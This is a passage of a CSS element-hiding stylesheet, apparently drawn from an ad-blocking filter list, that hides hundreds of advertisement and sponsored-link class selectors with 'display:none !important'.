ad_launchpad,.ad_leader,.ad_leaderboard,.ad_left,.ad_line,.ad_link,.ad_links,.ad_linkunit,.ad_loc,.ad_lrec,.ad_main,.ad_medrec,.ad_medrect,.ad_middle,.ad_mod,.ad_mp,.ad_mpu,.ad_mr,.ad_mrec,.ad_mrec_title_article,.ad_mrect,.ad_news,.ad_note,.ad_notice,.ad_one,.ad_p360,.ad_partner,.ad_partners,.ad_plus,.ad_post,.ad_power,.ad_primary,.ad_promo,.ad_rec,.ad_rectangle,.ad_right,.ad_right_col,.ad_row,.ad_row_bottom_item,.ad_side,.ad_sidebar,.ad_skyscraper,.ad_slug,.ad_slug_table,.ad_space,.ad_space_300_250,.ad_spacer,.ad_sponsor { display:none !important; } .ad_sponsoredsection,.ad_spot_b,.ad_spot_c,.ad_square_r,.ad_square_top,.ad_sub,.ad_tag_middle,.ad_text,.ad_text_w,.ad_title,.ad_top,.ad_top_leaderboard,.ad_top_left,.ad_topright,.ad_tower,.ad_unit,.ad_unit_rail,.ad_url,.ad_warning,.ad_wid300,.ad_wide,.ad_wrap,.ad_wrapper,.ad_wrapper_fixed,.ad_wrapper_top,.ad_wrp,.ad_zone,.adarea,.adarea-long,.adbanner,.adbannerbox,.adbannerright,.adbar,.adboard,.adborder,.adbot,.adbottom,.adbottomright,.adbox-outer,.adbox-wrapper,.adbox_300x600,.adbox_366x280,.adbox_468X60,.adbox_bottom,.adbox_br,.adbox_left,.adboxclass,.adboxesrow,.adbreak,.adbug,.adbutton,.adbuttons,.adcode,.adcol1,.adcol2,.adcolumn,.adcolumn_wrapper,.adcont,.adcopy,.add_300x250,.addiv,.adenquire,.adfieldbg,.adfoot,.adfootbox,.adframe,.adhead,.adhead_h,.adhead_h_wide,.adheader,.adheader100,.adheader416,.adhi,.adhint,.adholder,.adhoriz,.adiframe,.adinfo,.adinside,.adintro,.adits,.adjlink,.adkicker,.adkit,.adkit-advert,.adkit-lb-footer,.adlabel-horz,.adlabel-vert,.adlabelleft,.adlayer,.adleader,.adleaderboard,.adleft1,.adline,.adlink,.adlinks,.adlist,.adlnklst,.admarker,.admediumred,.admedrec,.admessage,.admodule,.admpu,.admpu-small,.adnation-banner,.adnotice,.adops,.adp-AdPrefix,.adpadding,.adpane,.adpic,.adprice,.adproxy,.adrec,.adright,.adroot,.adrotate_widget,.adrow,.adrow-post,.adrow1box1,.adrow1box3,.adrow1box4,.adrule,.ads-125,.ads-300,.ads-300x250,.ads-728x90-wrap,.ads-ads-top,.ads-banner,.ads-below-content,.ads-categories-bsa,.ads-custom,.ads-favicon,.ads-item,.ads-links-general,.ads-mpu,.ads-outer,.ads-profile,.ads-right,.ads-section,.ads-sidebar,.ads-sky,.ads-small,.ads-sponsors,.ads-stripe,.ads-text,.ads-top,.ads-wide,.ads-widget,.ads-widget-partner-gallery,.ads03,.ads160,.ads1_250,.ads24Block,.ads300,.ads460,.ads460_home,.ads468,.ads728,.ads728x90,.adsArea,.adsBelowHeadingNormal,.adsBlock,.adsBottom,.adsBox,.adsCell,.adsCont,.adsDiv,.adsFull,.adsImages,.adsInsideResults_v3,.adsMPU,.adsMiddle,.adsRight,.adsRow,.adsTextHouse,.adsTop,.adsTower2,.adsTowerWrap,.adsWithUs,.ads_125_square,.ads_180,.ads_300,.ads_300x100,.ads_300x250,.ads_320,.ads_337x280,.ads_728x90,.ads_big,.ads_big-half,.ads_box,.ads_box_headline,.ads_brace,.ads_catDiv,.ads_container,.ads_disc_anchor,.ads_disc_leader,.ads_disc_lwr_square,.ads_disc_skyscraper,.ads_disc_square,.ads_div,.ads_footer,.ads_header,.ads_holder,.ads_horizontal,.ads_leaderboard,.ads_lr_wrapper,.ads_medrect,.ads_mpu,.ads_outer,.ads_post_end,.ads_post_end_code,.ads_post_start,.ads_post_start_code,.ads_rectangle,.ads_remove,.ads_right,.ads_rightbar_top,.ads_sc_bl_i,.ads_sc_tb,.ads_sc_tl_i,.ads_show_if,.ads_side,.ads_sidebar,.ads_singlepost,.ads_spacer,.ads_takeover,.ads_title,.ads_top,.ads_top_promo,.ads_tr,.ads_verticalSpace,.ads_vtlLink,.ads_widesky,.ads_wrapperads_top,.adsafp,.adsbg300,.adsblockvert,.adsborder,.adsbottom,.adsbox,.adsboxitem,.adsbttmpg,.adsbyyahoo,.adscaleAdvert,.adscaleP6_canvas,.adsclick,.adscontainer,.adscreen,.adsd_shift100,.adsection_a2,.adsection_c2,.adsense-468,.adsense-ad,.adsense-category,.adsense-category-bottom,.adsense-googleAds,.adsense-heading,.adsense-overlay,.adsense-post,.adsense-right,.adsense-title,.adsense3,.adsense300,.adsenseAds,.adsenseBlock,.adsenseContainer,.adsenseGreenBox,.adsenseInPost,.adsenseList,.adsense_bdc_v2,.adsense_mpu,.adsensebig,.adsenseblock,.adsenseblock_bottom,.adsenseblock_top,.adsenselr,.adsensem_widget,.adsensesq,.adsenvelope,.adserver_zone,.adset,.adsforums,.adsghori,.adsgvert,.adshome,.adside,.adsidebox,.adsider,.adsingle,.adsleft,.adsleftblock,.adslink,.adslogan,.adslotleft,.adslotright,.adsmalltext,.adsmessage,.adsnippet_widget,.adspace,.adspace-MR,.adspace-widget,.adspace180,.adspace_bottom,.adspace_buysell,.adspace_rotate,.adspace_skyscraper,.adspacer,.adspot,.adspot728x90,.adstext,.adstextpad,.adstitle,.adstop,.adstory,.adstrip,.adtab,.adtable,.adtag,.adtech,.adtext,.adtext_gray,.adtext_horizontal,.adtext_onwhite,.adtext_vertical,.adtile,.adtips,.adtips1,.adtitle,.adtop,.adtravel,.adtxt,.adtxtlinks,.adunit,.adv-mpu,.adv-p,.adv-sidebar,.adv300,.advBox,.advSquare,.advVideobox,.adv_120x600,.adv_300x250,.adv_728x90,.adv_banner_hor,.adv_medium_rectangle,.adver,.adverTag,.adverTxt,.adver_cont_below,.advert-300-side,.advert-300x100-side,.advert-728x90,.advert-article-bottom,.advert-bannerad,.advert-bg-250,.advert-bloggrey,.advert-box,.advert-btm,.advert-head,.advert-horizontal,.advert-iab-300-250,.advert-iab-468-60,.advert-mpu,.advert-skyscraper,.advert-text,.advert-title,.advert-txt,.advert120,.advert300,.advert300x250,.advert300x300,.advert300x440,.advert350ih,.advert4,.advert5,.advert728x90,.advert8,.advertColumn,.advertCont,.advertContainer,.advertContent,.advertHeadline,.advertIslandWrapper,.advertRight,.advertSuperBanner,.advertText,.advertTitleSky,.advert_336,.advert_468x60,.advert_box,.advert_cont,.advert_container,.advert_djad,.advert_google_content,.advert_google_title,.advert_home_300,.advert_label,.advert_leaderboard,.advert_list,.advert_note,.advert_surr,.advert_top,.advertheader-red,.advertise,.advertise-here,.advertise-homestrip,.advertise-horz,.advertise-inquiry,.advertise-leaderboard,.advertise-list,.advertise-top,.advertise-vert,.advertiseContainer,.advertiseText,.advertise_ads,.advertise_here,.advertise_link,.advertise_link_sidebar,.advertisement,.advertisement-728x90,.advertisement-block,.advertisement-sidebar,.advertisement-space,.advertisement-sponsor,.advertisement-swimlane,.advertisement-text,.advertisement-top,.advertisement300x250,.advertisement468,.advertisementBox,.advertisementColumnGroup,.advertisementContainer,.advertisementHeader,.advertisementLabel,.advertisementPanel,.advertisementText,.advertisement_300x250,.advertisement_btm,.advertisement_caption,.advertisement_g,.advertisement_header,.advertisement_horizontal,.advertisement_top,.advertisementsOutterDiv,.advertiser,.advertiser-links,.advertisespace_div,.advertising-banner,.advertising-header,.advertising-leaderboard,.advertising-local-links,.advertising2,.advertisingTable,.advertising_block,.advertising_images,.advertisment,.advertisment_bar,.advertisment_caption,.advertisment_two,.advertize,.advertize_here,.advertorial,.advertorial-2,.advertorial-promo-box,.advertorial_red,.advertorialtitle,.adverts,.adverts-125,.adverts_RHS,.advt,.advt-banner-3,.advt-block,.advt-sec,.advt300,.advt720,.advtitle,.adwhitespace,.adwordListings,.adwords,.adwordsHeader,.adwrap,.adwrapper-lrec,.adwrapper948,.adzone-footer,.adzone-sidebar,.affiliate-link,.affiliate-sidebar,.affiliateAdvertText,.affiliates-sidebar,.affinityAdHeader,.afsAdvertising,.after_ad,.agi-adsaleslinks,.alb-content-ad,.alignads,.alt_ad,.anchorAd,.another_text_ad,.answer_ad_content,.aolSponsoredLinks,.aopsadvert,.apiAdMarkerAbove,.apiAds,.app_advertising_skyscraper,.archive-ads,.art_ads,.article-ad-box,.article-ads,.article-content-adwrap,.articleAd,.articleAd300x250,.articleAds,.articleAdsL,.articleEmbeddedAdBox,.article_ad,.article_adbox,.article_mpu_box,.article_page_ads_bottom,.articleads,.aseadn,.aux-ad-widget-1,.aux-ad-widget-2,.b-astro-sponsored-links_horizontal,.b-astro-sponsored-links_vertical,.b_ads_cont,.b_ads_top,.banmanad,.banner-468-60,.banner-468x60,.banner-ad,.banner-ads,.banner-adv,.banner-advert,.banner-adverts,.banner-buysellads,.banner160x600,.banner300by250,.banner300x100,.banner300x250,.banner468,.banner468by60,.banner728x90,.bannerADV,.bannerAd,.bannerAdWrapper300x250,.bannerAdWrapper730x86,.bannerAds,.bannerAdvert,.bannerRightAd,.banner_160x600,.banner_300x250,.banner_728x90,.banner_ad,.banner_ad_footer,.banner_ad_leaderboard,.bannerad,.bannerad-125tower,.bannerad-468x60,.barkerAd,.base-ad-mpu,.base_ad,.base_printer_widgets_AdBreak,.bg-ad-link,.bgnavad,.big-ads,.bigAd,.big_ad,.big_ads,.bigad,.bigad2,.bigbox_ad,.bigboxad,.billboard300x250,.billboard_ad,.biz-ad,.biz-ads,.biz-adtext,.blk_advert,.block-ad,.block-ad300,.block-admanager,.block-ads-bottom,.block-ads-top,.block-adsense,.block-adsense-managed,.block-adspace-full,.block-bg-advertisement-region-1,.block-deca_advertising,.block-google-admanager,.block-google_admanager,.block-openads,.block-openadstream,.block-openx,.block-thirdage-ads,.block-wtg_adtech,.blockAd,.blockAds,.block_ad,.block_ad_floating_bar,.block_ad_sb_text,.block_ad_sb_text2,.block_ad_sponsored_links,.block_ad_sponsored_links-wrapper,.block_ad_sponsored_links_localized,.blockad,.blocked-ads,.blog-ad-leader-inner,.blog-ads-container,.blogAd,.blogAdvertisement,.blogArtAd,.blogBigAd,.blog_ad,.blogads,.blox3featuredAd,.bn_textads,.body_ad,.body_sponsoredresults_bottom,.body_sponsoredresults_middle,.body_sponsoredresults_top,.bodyads,.bodyads2,.bookseller-header-advt,.bottom-ad,.bottom-ad-fr,.bottom-ads,.bottomAd,.bottomAds,.bottom_ad,.bottom_ad_block,.bottom_ads,.bottom_adsense,.bottom_right_ad,.bottomad,.bottomads,.bottomadvert,.bottombarad,.bottomrightrailAd,.bottomvidad,.box-ad,.box-ad-grey,.box-ads,.box-ads-small,.box-adsense,.box-adverts,.boxAd,.boxAds,.boxAdsInclude,.box_ad,.box_ad_container,.box_ad_content,.box_ad_spacer,.box_ad_wrap,.box_ads,.box_adv,.box_adv_new,.box_advertising,.box_advertisment_62_border,.box_content_ad,.box_content_ads,.box_textads,.boxad,.boxads,.boxyads,.bps-ad-wrapper,.bps-advertisement,.bps-advertisement-inline-ads,.br-ad,.breakad_container,.brokerad,.bsa_ads,.btm_ad,.btm_ad_container,.btn-ad,.bullet-sponsored-links,.bullet-sponsored-links-gray,.burstContentAdIndex,.busrep_poll_and_ad_container,.buttonAd,.buttonAds,.button_ads,.button_advert,.buttonadbox,.buttonads,.bx_ad,.bx_ad_right,.cA-adStrap,.cColumn-TextAdsBox,.cLeftTextAdUnit,.c_ligatus_nxn,.calendarAd,.calloutAd,.carbonad,.carbonad-tag,.care2_adspace,.catalog_ads,.category-ad,.categorySponsorAd,.category__big_game_container_body_games_advertising,.cb-ad-banner,.cb-ad-container,.cb_ads,.cb_navigation_ad,.cbstv_ad_label,.cbzadvert,.cbzadvert_block,.cdAdTitle,.cdmainlineSearchAdParent,.cdo-ad-section,.cdsidebarSearchAdParent,.centerAd,.center_ad,.centerad,.centered-ad,.chitikaAdCopy,.cinemabotad,.classifiedAdThree,.clearerad,.cmAdContainer,.cmAdFind,.cmAdSponsoredLinksBox,.cm_ads,.cms-Advert,.cnbc_badge_banner_ad_area,.cnbc_banner_ad_area,.cnbc_leaderboard_ad,.cnn160AdFooter,.cnnAd,.cnnMosaic160Container,.cnnStoreAd,.cnnStoryElementBoxAd,.cnnWCAdBox,.cnnWireAdLtgBox,.cnn_728adbin,.cnn_adcntr300x100,.cnn_adcntr728x90,.cnn_adspc336cntr,.cnn_adtitle,.cntrad,.column2-ad,.columnBoxAd,.columnRightAdvert,.com-ad-server,.comment-ad,.comment-ad-wrap,.comment-advertisement,.comment_ad_box,.common_advertisement_title,.communityAd,.conTSponsored,.conductor_ad,.confirm_ad_left,.confirm_ad_right,.confirm_leader_ad,.consoleAd,.container-adwords,.containerSqAd,.container_serendipity_plugin_google_adsense,.content-ad,.content-ads,.content-advert,.contentAd,.contentAdContainer,.contentAdFoot,.contentAdsWrapper,.content_ad,.content_ad_728,.content_adsense,.content_adsq,.content_tagsAdTech,.contentad,.contentad-home,.contentad300x250,.contentad_right_col,.contentadcontainer,.contentadfloatl,.contentadleft,.contentads,.contentadstartpage,.contents-ads-bottom-left,.contenttextad,.contest_ad,.cp_ad,.cpmstarHeadline,.cpmstarText,.create_ad,.cs-mpu,.cscTextAd,.cse_ads,.cspAd,.ct_ad,.ctnAdSkyscraper,.ctnAdSquare300,.cube-ad,.cubeAd,.cube_ads,.currency_ad,.custom_ads,.cwAdvert,.cxAdvertisement,.darla_ad,.dart-ad,.dartAdImage,.dart_ad,.dart_tag,.dartadvert,.dartiframe,.dc-ad,.dcAdvertHeader,.deckAd,.deckads,.detail-ads,.detailMpu,.detail_ad,.detail_top_advert,.dfrads,.displayAdSlot,.divAd,.divAdright,.div_adv300,.div_advstrip,.divad1,.divad2,.divad3,.divads,.divider_ad,.dlSponsoredLinks,.dmco_advert_iabrighttitle,.downloadAds,.download_ad,.downloadad,.dsq_ad,.dualAds,.dynamic-ads,.dynamic_ad,.e-ad,.ec-ads,.ec-ads-remove-if-empty,.em-ad,.em_ads_box_dynamic_remove,.embed-ad,.embeddedAd,.entry-body-ad,.entry-injected-ad,.entry_sidebar_ads,.entryad,.ez-clientAd,.f_Ads,.feature_ad,.featuredAds,.featured_ad,.featuredadvertising,.fireplaceadleft,.fireplaceadright,.fireplaceadtop,.firstpost_advert_container,.flagads,.flash-advertisement,.flash_ad,.flash_advert,.flashad,.flexiad,.flipbook_v2_sponsor_ad,.floatad,.floated_right_ad,.floatingAds,.fm-badge-ad,.fns_td_wrap,.fold-ads,.footad,.footer-ad,.footer-advert,.footerAd,.footerAdModule,.footerAds,.footerAdslot,.footerAdverts,.footerTextAd,.footer_ad,.footer_ad336,.footer_ads,.footer_block_ad,.footer_bottomad,.footer_line_ad,.footer_text_ad,.footerad,.forumtopad,.freedownload_ads,.frn_adbox,.frn_cont_adbox,.frontads,.frontpage-google-ad,.ft-ad,.ftdAdBar,.ftdContentAd,.full_ad_box,.full_width_ad,.fullbannerad,.g3rtn-ad-site,.gAdRows,.gAdSky,.gAdvertising,.g_ggl_ad,.ga-ads,.ga-textads-bottom,.ga-textads-top,.gaTeaserAds,.gaTeaserAdsBox,.gads_cb,.gads_container,.gallery_ad,.gam_ad_slot,.gameAd,.gamesPage_ad_content,.gbl_advertisement,.gen_side_ad,.gglAds,.global_banner_ad,.googad,.googads,.google-ad,.google-ad-container,.google-ads,.google-ads-boxout,.google-ads-slim,.google-adsense,.google-right-ad,.google-sponsored-ads,.google-sponsored-link,.google468,.google468_60,.googleAd,.googleAd-content,.googleAd-list,.googleAd300x250_wrapper,.googleAdBox,.googleAdSense,.googleAdSenseModule,.googleAd_body,.googleAds,.googleAds_article_page_above_comments,.googleAdsense,.googleContentAds,.googleProfileAd,.googleSearchAd_content,.googleSearchAd_sidebar,.google_ad,.google_ad_wide,.google_add_container,.google_ads,.google_ads_bom_title,.google_ads_content,.google_adsense_footer,.googlead,.googleaddiv,.googleaddiv2,.googleads,.googleads_300x250,.googleads_title,.googleadsense,.googleafc,.googley_ads,.gpAdBox,.gpAds,.gradientAd,.grey-ad-line,.group_ad,.gsAd,.gsfAd,.gt_ad,.gt_ad_300x250,.gt_ad_728x90,.gt_adlabel,.gutter-ad-left,.gutter-ad-right,.gx_ad,.h-ad-728x90-bottom,.h_Ads,.h_ad,.half-ad,.half_ad_box,.hcf-ad,.hcf-ad-rectangle,.hcf-cms-ad,.hd_advert,.hdr-ads,.head_ad,.header-ad,.header-advert,.header-google-ads,.header-taxonomy-image-sponsor,.headerAd,.headerAdCode,.headerAds,.headerAdvert,.headerTextAd,.header_ad,.header_ad_center { display:none !important; } .header_ad_div,.header_ads,.header_advertisement,.header_advertisment,.headerad,.headerad-720,.hi5-ad,.highlightsAd,.hm_advertisment,.hn-ads,.home-ad-links,.homeAd,.homeAd1,.homeAd2,.homeAdBoxA,.homeAdBoxBetweenBlocks,.homeAdBoxInBignews,.homeAdSection,.homeMediumAdGroup,.home_ad_bottom,.home_advertisement,.home_advertorial,.home_mrec_ad,.homead,.homepage-ad,.homepage300ad,.homepageFlexAdOuter,.homepageMPU,.homepage_middle_right_ad,.homepageinline_adverts,.hor_ad,.horiz_adspace,.horizontalAd,.horizontal_ad,.horizontal_ads,.horizontaltextadbox,.horizsponsoredlinks,.hortad,.houseAd1,.houseAdsStyle,.housead,.hoverad,.hp-col4-ads,.hp2-adtag,.hp_ad_cont,.hp_ad_text,.hp_t_ad,.hp_w_ad,.hpa-ad1,.html-advertisement,.ic-ads,.ico-adv,.idMultiAd,.iframe-ad,.image-advertisement,.imageAd,.imageads,.imgad,.in-page-ad,.in-story-ads,.in-story-text-ad,.inStoryAd-news2,.indEntrySquareAd,.indie-sidead,.indy_googleads,.infoBoxThreadPageRankAds,.inhousead,.inline-ad,.inline-mpu,.inline-mpu-left,.inlineSideAd,.inline_ad,.inline_ad_title,.inlinead,.inlineadsense,.inlineadtitle,.inlist-ad,.inlistAd,.inner-advt-banner-3,.innerAds,.innerad,.inpostad,.insert_advertisement,.insertad,.insideStoryAd,.inteliusAd_image,.interest-based-ad,.internalAdsContainer,.iprom-ad,.is24-adplace,.isAd,.islandAd,.islandAdvert,.islandad,.itemAdvertise,.jimdoAdDisclaimer,.jp-advertisment-promotional,.js-advert,.kdads-empty,.kdads-link,.kw_advert,.kw_advert_pair,.l_ad_sub,.label-ad,.labelads,.largeRecAdNewsContainerRight,.largeRectangleAd,.largeUnitAd,.large_ad,.lastRowAd,.lazyload_ad,.lcontentbox_ad,.leadAd,.leaderAdSlot,.leaderAdTop,.leaderAdvert,.leaderBoardAdHolder,.leaderOverallAdArea,.leader_ad,.leaderboardAd,.leaderboardAdContainer,.leaderboardAdContainerInner,.leaderboard_ad,.leaderboardad,.leaderboardadtop,.left-ad,.left-advert,.leftAd,.leftAdColumn,.leftAds,.left_ad,.left_ad_box,.left_adlink,.left_ads,.left_adsense,.leftad,.leftadtag,.leftbar_ad_160_600,.leftbarads,.leftbottomads,.leftnavad,.lgRecAd,.lg_ad,.ligatus,.linead,.link_adslider,.link_advertise,.live-search-list-ad-container,.livingsocial-ad,.ljad,.local-ads,.log_ads,.logoAds,.logoad,.logoutAd,.longAd,.longAdBox,.lowerAds,.lr-ad,.m-ad-tvguide-box,.m4-adsbygoogle,.m_banner_ads,.macAd,.macad,.main-ad,.main-advert,.main-tabs-ad-block,.mainAd,.mainLeftAd,.mainLinkAd,.mainRightAd,.main_ad,.main_ad_bg_div,.main_adbox,.main_ads,.main_intro_ad,.map_media_banner_ad,.marginadsthin,.marketing-ad,.masthead_topad,.matador_sidebar_ad_600,.mdl-ad,.media-advert,.mediaAd,.mediaAdContainer,.mediaResult_sponsoredSearch,.medium-rectangle-ad,.mediumRectangleAdvert,.medium_ad,.medrect_ad,.member-ads,.menuItemBannerAd,.menueadimg,.messageBoardAd,.mf-ad300-container,.micro_ad,.mid_ad,.mid_page_ad,.midad,.middle-ad,.middleAds,.middlead,.middleads,.min_navi_ad,.mini-ad,.miniad,.miscAd,.mmc-ad,.mmcAd_Iframe,.mod-ad-lrec,.mod-ad-n,.mod-adopenx,.mod-vertical-ad,.mod_admodule,.module-ad,.module-ad-small,.module-ads,.module-advertisement,.module-sponsored-ads,.moduleAd,.moduleAdvertContent,.module_ad,.module_box_ad,.modulegad,.moduletable-advert,.moduletable-googleads,.moduletablesquaread,.mos-ad,.mpu-ad,.mpu-ad-con,.mpu-advert,.mpu-footer,.mpu-fp,.mpu-title,.mpu-top-left,.mpu-top-left-banner,.mpu-top-right,.mpu01,.mpuAd,.mpuAdSlot,.mpuAdvert,.mpuArea,.mpuBox,.mpuContainer,.mpuHolder,.mpuTextAd,.mpu_ad,.mpu_advert,.mpu_container,.mpu_gold,.mpu_holder,.mpu_platinum,.mpu_side,.mpu_text_ad,.mpuad,.mpuholderportalpage,.mrec_advert,.ms-ads-link,.msfg-shopping-mpu,.mvw_onPageAd1,.mwaads,.my-ad250x300,.nSponsoredLcContent,.nSponsoredLcTopic,.nadvt300,.narrow_ad_unit,.narrow_ads,.navAdsBanner,.navBads,.nav_ad,.navadbox,.navcommercial,.navi_ad300,.naviad,.nba300Ad,.nbaT3Ad160,.nbaTVPodAd,.nbaTwo130Ads,.nbc_ad_carousel_wrp,.newPex_forumads,.newTopAdContainer,.newad,.newsAd,.news_article_ad_google,.newsviewAdBoxInNews,.newsvinemsn_adtype,.nexusad,.nf-adbox,.nn-mpu,.noAdForLead,.normalAds,.nrAds,.nsAdRow,.nu2ad,.oas-ad,.oas-bottom-ads,.oas_ad,.oas_advertisement,.offer_sponsoredlinks,.oio-banner-zone,.oio-link-sidebar,.oio-zone-position,.on_single_ad_box,.onethirdadholder,.openads,.openadstext_after,.openx,.openx-ad,.openx_ad,.osan-ads,.other_adv2,.outermainadtd1,.ovAdPromo,.ovAdSky,.ovAdartikel,.ov_spns,.ovadsenselabel,.pageAds,.pageBottomGoogleAd,.pageGoogleAd,.pageGoogleAdFlat,.pageGoogleAdSubcontent,.pageGoogleAds,.pageGoogleAdsContainer,.pageLeaderAd,.page_content_right_ad,.pagead,.pageads,.pagenavindexcontentad,.paneladvert,.partner-ad,.partner-ads-container,.partnerAd,.partnersTextLinks,.pencil_ad,.player_ad_box,.player_hover_ad,.player_page_ad_box,.plista_inimg_box,.pm-ad,.pmad-in2,.pnp_ad,.pod-ad-300,.podRelatedAdLinksWidget,.podSponsoredLink,.portalCenterContentAdBottom,.portalCenterContentAdMiddle,.portalCenterContentAdTop,.portal_searchresultssponsoredlist,.portalcontentad,.post-ad,.postAd,.post_ad,.post_ads,.post_sponsor_unit,.postbit_adbit_register,.postbit_adcode,.postgroup-ads,.postgroup-ads-middle,.prebodyads,.premium_ad_container,.promoAd,.promoAds,.promo_ad,.promoboxAd,.promotionTextAd,.ps-ligatus_placeholder,.pub_300x250,.pub_300x250m,.pub_728x90,.publication-ad,.publicidad,.puff-advertorials,.qa_ad_left,.qm-ad-content,.qm-ad-content-news,.quigo-ad,.qzvAdDiv,.r_ad_1,.r_ad_box,.r_ads,.rad_container,.rect_ad_module,.rectad,.rectangle-ad,.rectangleAd,.rectanglead,.redads_cont,.referrerDetailAd,.regular_728_ad,.regularad,.relatedAds,.related_post_google_ad,.relatesearchad,.remads,.resourceImagetAd,.result_ad,.reviewMidAdvertAlign,.rght300x250,.rhads,.rhs-ad,.rhs-ads-panel,.rhs-advert-container,.rhs-advert-link,.rhs-advert-title,.right-ad,.right-ad-holder,.right-ad2,.right-ads,.right-ads2,.right-sidebar-box-ad,.rightAd,.rightAdBox,.rightAdverts,.rightColAd,.rightColumnRectAd,.rightRailAd,.right_ad,.right_ad_160,.right_ad_box,.right_ad_common_block,.right_ad_text,.right_ad_top,.right_ads,.right_ads_column,.right_box_ad_rotating_container,.right_col_ad,.right_hand_advert_column,.right_side-partyad,.rightad,.rightad_1,.rightad_2,.rightadbox1,.rightads,.rightadunit,.rightbigcolumn_ads,.rightbigcolumn_ads_nobackground,.rightcol_boxad,.rightcoladvert,.rightcoltowerad,.rightmenu_ad,.rnav_ad,.rngtAd,.rot_ads,.round_box_advert,.roundedCornersAd,.roundingrayboxads,.rt_ad1_300x90,.rt_ad_300x250,.rt_ad_call,.s2k_ad,.savvyad_unit,.sb-ad-sq-bg,.sbAd,.sbAdUnitContainer,.sb_ad_holder,.sb_adsN,.sb_adsNv2,.sb_adsW,.sb_adsWv2,.scanAd,.scc_advert,.sci-ad-main,.sci-ad-sub,.search-ad,.search-results-ad,.search-sponsor,.search-sponsored,.searchAd,.searchAdTop,.searchAds,.searchSponsoredResultsBox,.searchSponsoredResultsList,.search_column_results_sponsored,.search_results_sponsored_top,.section-ad2,.section_mpu_wrapper,.section_mpu_wrapper_wrapper,.selfServeAds,.sepContentAd,.serp_sponsored,.servsponserLinks,.shoppingGoogleAdSense,.showAd_No,.showAd_Yes,.showcaseAd,.sidbaread,.side-ad,.side-ads,.side-sky-banner-160,.sideAd,.sideBoxAd,.side_ad,.side_ad2,.side_ad_1,.side_ad_2,.side_ad_3,.sidead,.sideads,.sideadsbox,.sideadvert,.sidebar-ad,.sidebar-ads,.sidebar-content-ad,.sidebar-text-ad,.sidebarAd,.sidebarAdUnit,.sidebarAdvert,.sidebar_ad,.sidebar_ad_300_250,.sidebar_ads,.sidebar_ads_336,.sidebar_adsense,.sidebar_box_ad,.sidebarad,.sidebarad_bottom,.sidebaradbox,.sidebarads,.sidebarboxad,.sideheadnarrowad,.sideheadsponsorsad,.simple_ads_manager_widget,.single-google-ad,.singleAd,.singleAdsContainer,.single_ad,.singlead,.singleadstopcstm2,.site_ad_120_600,.site_ad_300x250,.sitesponsor,.skinAd,.skin_ad_638,.sky-ad,.skyAd,.skyAdd,.skyAdvert,.skyAdvert2,.sky_ad,.sky_scraper_ad,.skyad,.skyjobsadtext,.skyscraper-ad,.skyscraper_ad,.skyscraper_bannerAdHome,.sleekadbubble,.slideshow-ad,.slpBigSlimAdUnit,.slpSquareAdUnit,.sm_ad,.smallSkyAd1,.smallSkyAd2,.small_ad,.small_ads,.smallad-left,.smallads,.smallsponsorad,.smart_ads_bom_title,.spLinks,.specialAd175x90,.speedyads,.sphereAdContainer,.spl-ads,.spl_ad,.spl_ad2,.spl_ad_plus,.splitAd,.splitAdResultsPane,.sponlinkbox,.spons-link,.spons_links,.sponslink,.sponsor-ad,.sponsor-link,.sponsor-links,.sponsor-services,.sponsorPanel,.sponsorPost,.sponsorPostWrap,.sponsorStrip,.sponsor_ad_area,.sponsor_area,.sponsor_bar,.sponsor_columns,.sponsor_footer,.sponsor_line,.sponsor_links,.sponsor_logo,.sponsoradtitle,.sponsored-ads,.sponsored-chunk,.sponsored-editorial,.sponsored-features,.sponsored-links,.sponsored-links-alt-b,.sponsored-links-holder,.sponsored-links-right,.sponsored-post,.sponsored-post_ad,.sponsored-results,.sponsored-right-border,.sponsored-text,.sponsoredBox,.sponsoredInfo,.sponsoredInner,.sponsoredLabel,.sponsoredLink,.sponsoredLinks,.sponsoredLinks2,.sponsoredLinksHeader,.sponsoredProduct,.sponsoredResults,.sponsoredSideInner,.sponsored_ads,.sponsored_box,.sponsored_box_search,.sponsored_by,.sponsored_link,.sponsored_links,.sponsored_links_title_container,.sponsored_links_title_container_top,.sponsored_links_top,.sponsored_result,.sponsored_results,.sponsored_ss,.sponsored_well,.sponsoredibbox,.sponsoredlink,.sponsoredlinks,.sponsoredlinkscontainer,.sponsoredresults,.sponsoredtextlink_container_ovt,.sponsoring_link,.sponsorlink,.sponsorlink2,.sponsormsg,.sport-mpu-box,.spotlightAd,.squareAd,.square_ad,.square_banner_ad,.squared_ad,.ss-ad-banner,.ss-ad-mpu,.standard-ad,.start__newest__big_game_container_body_games_advertising,.staticAd,.stickyAdLink,.stock-ticker-ad-tag,.stocks-ad-tag,.store-ads,.story_AD,.story_ad_div,.story_right_adv,.storyad,.subad,.subadimg,.subcontent-ad,.subtitle-ad-container,.sugarad,.super-ad,.supercommentad_left,.supercommentad_right,.supp-ads,.supportAdItem,.surveyad,.t10ad,.tab_ad,.tab_ad_area,.tablebordersponsor,.tadsanzeige,.tadsbanner,.tadselement,.tallad,.tblTopAds,.tbl_ad,.tbox_ad,.td-Adholder,.td-TrafficWeatherWidgetAdGreyBrd,.teaser-sponsor,.teaserAdContainer,.teaser_adtiles,.teaser_advert_content,.text-ad,.text-ad-links,.text-ads,.text-advertisement,.text-g-advertisement,.text-g-group-short-rec-ad,.text-g-net-grp-google-ads-article-page,.textAd,.textAdBox,.textAds,.text_ad,.text_ads,.textad,.textadContainer,.textad_headline,.textadbox,.textadheadline,.textadlink,.textads,.textads_left,.textads_right,.textadsds,.textadsfoot,.textadtext,.textadtxt,.textadtxt2,.textlink-ads,.textlinkads,.tf_page_ad_search,.thirdage_ads_300x250,.thirdage_ads_728x90,.thisIsAd,.thisIsAnAd,.ticket-ad,.tileAds,.tips_advertisement,.title-ad,.title_adbig,.tncms-region-ads,.toolad,.toolbar-ad,.top-ad,.top-ad-space,.top-ads,.top-banner-ad,.top-left-nav-ad,.top-menu-ads,.topAd,.topAdWrap,.topAds,.topAdvertisement,.topAdverts,.topBannerAd,.topLeaderboardAd,.top_Ad,.top_ad,.top_ad1,.top_ad_728,.top_ad_728_90,.top_ad_disclaimer,.top_ad_div,.top_ad_post,.top_ad_wrapper,.top_ads,.top_advert,.top_advertisement,.top_advertising_lb,.top_bar_ad,.top_container_ad,.topad,.topad-bar,.topadbox,.topads,.topadspot,.topadvertisementsegment,.topboardads,.topcontentadvertisement,.topic_inad,.topstoriesad,.toptenAdBoxA,.tourFeatureAd,.tower-ad,.towerAd,.towerAdLeft,.towerAds,.tower_ad,.tower_ad_disclaimer,.towerad,.tr-ad-adtech-placement,.tribal-ad,.ts-ad_unit_bigbox,.ts-ba